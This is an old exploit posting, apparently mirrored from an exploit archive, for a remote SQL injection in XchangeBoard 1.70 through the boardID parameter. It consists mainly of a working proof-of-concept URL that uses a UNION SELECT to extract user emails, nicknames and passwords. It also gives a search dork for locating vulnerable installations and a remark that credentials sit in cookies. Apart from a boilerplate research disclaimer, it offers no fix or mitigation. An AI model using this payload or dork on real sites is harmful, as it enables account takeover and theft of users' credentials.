XchangeBoard 1.70 (boardID) Remote SQL Injection Vulnerability
Published:2008-07-02
Exploit:
[www.sebug.net]
The following procedures (methods) may contain something offensive,they are only for security researches and teaching , at your own risk!
The following procedures (methods) may contain something offensive,they are only for security researches and teaching , at your own risk!
######################
#
# xchangeboard 1.70 final and lower
#
#
######################
#
#Bug by: haZl0oh #
#Dork: "Powered by xchangeboard"
#info:you have to be an registered user to use it like this !!!!
#there should be a lot more vulns there ;)
#
#
#
# credentials like passwords are saved as cookies .... :D
##
###
##
#
#PoC:
#http://site.com/path/newThread.php?boardID=+999999%20union%20select%20email,concat_ws(0x3a,nick,substring(password,1,100)),email,email,email%20from%20user/*
#
# #
#
#
#######################
#
#Greetz to h0yt3r ,everiZzel & Mastermaefju
#
#######################
#######################
// Sebug.net [ 2008-07-03 ]